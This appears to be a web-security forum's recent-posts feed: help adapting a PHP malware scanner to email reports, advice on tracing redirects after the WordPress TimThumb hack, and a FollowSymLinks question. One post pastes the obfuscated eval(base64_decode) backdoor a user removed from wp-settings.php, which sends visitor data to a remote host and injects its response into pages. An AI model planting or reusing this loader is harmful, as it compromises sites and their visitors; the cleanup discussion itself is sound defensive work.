Recent Posts

Since you're not accumulating text lines into $OutputText anymore, you'll need to test $PlainTextLines instead. Try changing

if(count($OutputText) > 1)
to
if(count($PlainTextLines ) > 1)
   

I keep getting a blank email message, can you see if I edited it right?
or maybe I did not understand something.

Thanks
Randy

//START FUNCTION

# ACCUMULATES ALL THE WARNING MESSAGES FOR THIS FILE.
//--------------------------------------------------------------- NEW

$PlainTextLines = array();
//--------------------------------------------------------------- NEW

# SEARCH THE FILE FOR EACH OF THE ABOVE SNIPPETS.

foreach($SuspiciousSnippets as $snippet) 

{

$matches = array();

if($matchcount = preg_match_all($snippet, $file, $matches, PREG_PATTERN_ORDER | PREG_OFFSET_CAPTURE))

{

$i = 0;

foreach($matches[0] as $occurrence)

# $occurrence is an array itself 0=>string, 1=>offset

{

$i++;

# THE 80 CHARACTERS AFTER START OF MATCH INSTANCE

$s = substr($file, $occurrence[1], 80);

$newline = (($i === 1) ? '<br><br>' : '<br>');

//---------------------------------------------------------------- NEW

$PlainTextLines[] = "File matches regex... [the rest of your message]";
//--------------------------------------------------------------- NEW

}

}

}

# REPORT ALL THREAT MESSAGES AT ONCE, IF THERE WERE ANY.

# TO PRINT EVERY FILENAME EXAMINED, MAKE THE THRESHOLD 0.
//--------------------------------------------------------------- NEW
$msg = '';  
if(count($PlainTextLines ) > 1)
$msg = implode("\n", $PlainTextLines);

//--------------------------------------------------------------- NEW

{
//--------------------------------------------------------------- NEW

foreach($PlainTextLines as $s)

$msg .= ($s . "\n");
//--------------------------------------------------------------- NEW

}

} // END FUNCTION

/*********************** SEND THE RESULTS **********************/
$subject = "Report, ".$datestamp;
if ($email=="1") mail($email_address, $subject, $msg);
/*********************** SEND THE RESULTS **********************/

Ok. let me give that a try tonight thanks

I will either have two separate copy's, one to read online normal and another from cron
just letting me know a match was found etc, and I should take a look.

or maybe when I pass a .php?cron=1, send email and .php?cron=0, just run normal ( both using just one script)

But at least I have an idea on how to do this now.

Thank you so much for helping
Randy

Ok, I understand your situation better now.

What you want to do certainly seems possible. I even gave some thought to revising the script to make something like that easier (or to save the results to a disk file on the server, for example), but decided not to do that because it might encourage people to do things with the output text that they shouldn't. 

The key concept to the method you need is in FindMaliciousCodeSnippets(). These lines of code accumulate output lines into an array. Then at the end, all the lines are output at once using a loop:

I'd suggest that you create a separate array to do the same sort of thing for your plain text messages, except make that array global so you can add items to it from anywhere in the script.

# ACCUMULATES ALL THE WARNING MESSAGES FOR THIS FILE.
$OutputText = array(CleanColorText($filename, 'blue'));

# The above example starts the array off with one entry, the name of the file.
# For yours, you'd probably use this (an empty array) instead:

$PlainTextLines = array();

# SEARCH THE FILE FOR EACH OF THE ABOVE SNIPPETS.
foreach($SuspiciousSnippets as $snippet) 
{

$matches = array();

if($matchcount = preg_match_all($snippet, $file, $matches, PREG_PATTERN_ORDER | PREG_OFFSET_CAPTURE))

{

$i = 0;

foreach($matches[0] as $occurrence)

# $occurrence is an array itself 0=>string, 1=>offset

{

$i++;

# THE 80 CHARACTERS AFTER START OF MATCH INSTANCE

$s = substr($file, $occurrence[1], 80);

$newline = (($i === 1) ? '<br><br>' : '<br>');

# This is where, instead of using echo to put the text on the page,
# I push the text line into the array:

$OutputText[] = $newline . 

CleanColorText("Regex ($i of $matchcount): ", 'black') . 

CleanColorText($snippet, 'red') . 

CleanColorText(": " . $s, 'black'); 

                     
# You would probably do it more like this:

$PlainTextLines[] = "File matches regex... [the rest of your message]";

}

}
}

# This is where all the messages are output to the page at once.

# REPORT ALL THREAT MESSAGES AT ONCE, IF THERE WERE ANY.
# TO PRINT EVERY FILENAME EXAMINED, MAKE THE THRESHOLD 0.
if(count($OutputText) > 1)
{

foreach($OutputText as $s)

echo $s;

echo '<br><br>';
}

# Instead, when you're ready to send the email, you'd do something like this:

foreach($PlainTextLines as $s)

$msg .= ($s . "\n");

# Or this might be equivalent:

$msg = implode("\n", $PlainTextLines);

   
   
Then send it.

mail(....);

I think that should work fine as long as all your text is safe for the email.

It would probably be best to create all your own output messages, and not try to use the same text that's being output with "echo", especially because all those are going through CleanColorText() anyway, which you don't want to do.

I hope that helps.

I explain things, a bit unclear and sometimes come off as a newbe but I'm not all that
new to php, I'm so anal I use phpMailer with a backup smtp, and clean all data both inserted and
displayed, 10 times to sunday I just posted those lines as a basic example what I should have
done is just ask how to capture the info properly and efficiently to the email message.

I would have never in a million years ever have sent myself the actual malicious code if found, just
the page it was found in, and the type of match. a basic text email would handle that just fine.

this would be just another added convenience and safe guard to read in the morning, I could
also match returned results as a example, and if found, fire off a text as well, AGAIN Matching
regex only not the code itself.

Getting the Matching regex type and path its found in, is the only thing, that's holding me up..
That's why I asked.

Thanks
Randy

Yes, the code that you added with your edit was bad.  You did the right thing by removing it from the file. 

There are several ways that your requests could be getting redirected.

A useful tool for diagnosing these is the "Live HTTP Headers" Firefox add-on. It will show you in real time whether your requests are being redirected by your server. Firefox also gives you the option of turning JavaScript off.  If you are redirected when JavaScript is on, but not when it is off, then the place to look for redirect code is in JavaScript from your site, either on pages or in separate .js files. (If you don't already have Firefox, I do recommend it even if you only use it for this purpose. Get FF and its NoScript add-on, and then "Live HTTP Headers".)

Sections 12) to 14) at http://25yearsofprogramming.com/blog/20071223.htm describe some of the redirect methods and show examples of suspicious code for each.

First, find all the .htaccess files in your site and visually inspect each one for rewrite rules that mention any of the sites you're being redirected to (or any sites other than yours). 

It sounds like you've not yet found all the bad code that was installed by the hack.

I'm not specifically familiar with this TimThumb hack, but it sounds like you've done a good job of finding people who are. A web search shows that a lot has been written about it. 

Make sure that your WordPress is upgraded to latest version, and either remove or update your theme that uses the timthumb code, or upgrade timthumb itself to the newest version. Some articles say that there can be multiple instances of timthumb in a site; in that case it's necessary to upgrade all of them.

Here are some useful references if you haven't already discovered them:

http://redleg-redleg.blogspot.com/2011/08/malware-hosted-newportalsecom.html

Sort of rambling, but mentions many filenames to inspect, etc, and mentions clearing browser cache and deleting the cookies that have been set by your site:
http://wordpress.org/support/topic/iframe-hack-3 (the thread spans 2 pages)

I don't know, so I had to research it.

It looks like maybe it could be a danger after a site gets hacked, if the hacker, during the hack, is able to create symlinks to files that they want to access even after you clean up and secure the site. Those symlinks could give them access to areas they're not supposed to be able to reach. But that doesn't mean they make the site hackable; in that scenario, it only matters after they've done the hack.

Other than that, it doesn't appear to me that it's much of a risk, if any, especially since the feature is enabled by default on virtually all shared hosting accounts.  The reason is that mod_rewrite (RewriteEngine On, RewriteCond, RewriteRule) only works when FollowSymLinks is enabled. Many or most websites, including Joomla ones, use the RewriteEngine commands, so FollowSymLinks is basically a necessity, whether it's any risk or not.

I wouldn't worry about it.

The text that the script outputs is HTML intended for display on a web page, and it is sanitized so that suspected malicious snippets can be displayed on the page without having a malicious effect. 

As described at http://www.php.net/manual/en/function.mail.php , sending an email can be somewhat complicated. In a plain text email, any line longer than 70 characters must be cut up into sections. Most of the lines from the script are longer than 70 characters. 

In addition, if you send the email to yourself as plain text, it will be full of HTML tags and HTML entities (such as < being represented as &lt;), so the result will be very cluttered or even look like garbage. If you try to process the text to make the garbage readable, you can make the malicious code of malicious again, and you could end up sending yourself a dangerous email. 

On the other hand, sending the e-mail to yourself as HTML has its own set of complications, which you can read about in the link above.

The script outputs all its text to the page with the PHP "echo" command. In order to send the output in an email, you would have to change all the "echo" statements so that the output is instead accumulated into a global array of text lines. When finished, you would concatenate all those lines into your $msg variable.

I do not recommend doing that. It might work fine as long as the report only contains harmless text and false positives, but if it ever finds a real threat, the email you send yourself could be dangerous.

The script is intended as a tool to use on a site that has already been hacked, to help locate malicious text and determine the extent of the damage. If you're trying to use it for ongoing monitoring, it's a lot more important to protect the site so it doesn't get hacked than to monitor it for "when" it does get hacked.

If this is the first time you've attempted to use the mail() function, it would be a lot safer to practice with it on some more trivial applications first than to dive into it with this potentially hazardous one.

To whoever is lucky enough to read through my problem

I have to say this site has been quite informative!  I've digested a few Website security articles and have to say they were exactly what I was looking for.  But my problem still persists!

I had a few websites running Wordpress which had certain themes installed using the Timthumb script (used to format images from what I hear).  In August their was a nice vulnerability in the script and 1000's of sites got "hacked" or were compromised, including mine !

So I went threw as many articles as I could and I have decided to seek so friendly forum help.

What I found was some malicious code in the "l10n.js" file (bunch of numbers and what not).  I cleaned up the file (basically used a fresh Wordpress download l10n.js file to compare and clean).
I also went through any files that were different in size compared to the default Wordpress install.  Anything that was different I opened up and did my best to scan through the code.

In the wp-settings.php file I notice some weird code near the bottom of the file (bunch of letters numbers symbols, wish I had saved it) so I deleted it out. Seems to have done no harm.

All scans come up clean, Google has not flagged the site (only one on my shared hosting sites was flagged and I deleted it because I really didn't need it).  3 sites came up infected with Scuri scan initially but all come up clean now.

The Problem:

What I am noticing is every so often when I visit one of the three sites, I am redirected to Yahoo Associated Content site automatically and sometimes i'm redirected a bunch of times (every half second) to all these different sites.

I don't know where to look for the problem and any advice would be helpful!

Thanks a bunch,
Robb
P.s. I also did a scan with the script on your site...I don't really know what to look for in the results (or what should flag me), any help here would be much appreciated!  

Edit: I found the code I deleted from the wp-settings.php file.  After reading all those articles, I think I did the right thing.

function counter_wordpress() {$_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTI zNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1 IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref;$ch = curl_init($url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_TIMEOUT, 2);$re = curl_exec($ch);curl_close($ch);echo $re;}add_action('wp_head', 'counter_wordpress');
do_action( 'init' );
 

Is there any danger when using the "FollowSymLinks" command present in the .htaccess for joomla websites, maybe act as vulnerability to be exploited by hackers?